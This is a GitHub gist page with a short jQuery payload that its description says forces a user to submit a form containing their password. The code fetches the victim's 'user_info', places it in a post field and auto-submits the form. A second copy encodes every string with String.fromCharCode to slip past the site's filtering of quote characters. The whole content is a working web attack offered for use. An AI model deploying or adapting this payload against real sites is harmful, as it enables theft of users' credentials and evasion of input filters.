Created
August 30, 2012 11:24
-
-
Save ryankearney/3526645 to your computer and use it in GitHub Desktop.
JavaScript payload to force user to submit a form with their password.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //jQuery Payload | |
| $.get("user_info", | |
| function(data) { | |
| $("#content").val(escape(data)); | |
| $("form").submit(); | |
| } | |
| ); | |
| // Strings changed to String.fromCharCode() to avoid filtering of ' and " in posts. | |
| $.get(String.fromCharCode(117,115,101,114,95,105,110,102,111), | |
| function(data) { | |
| $(String.fromCharCode(35,99,111,110,116,101,110,116)).val(escape(data)); | |
| $(String.fromCharCode(102,111,114,109)).submit(); | |
| } | |
| ); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment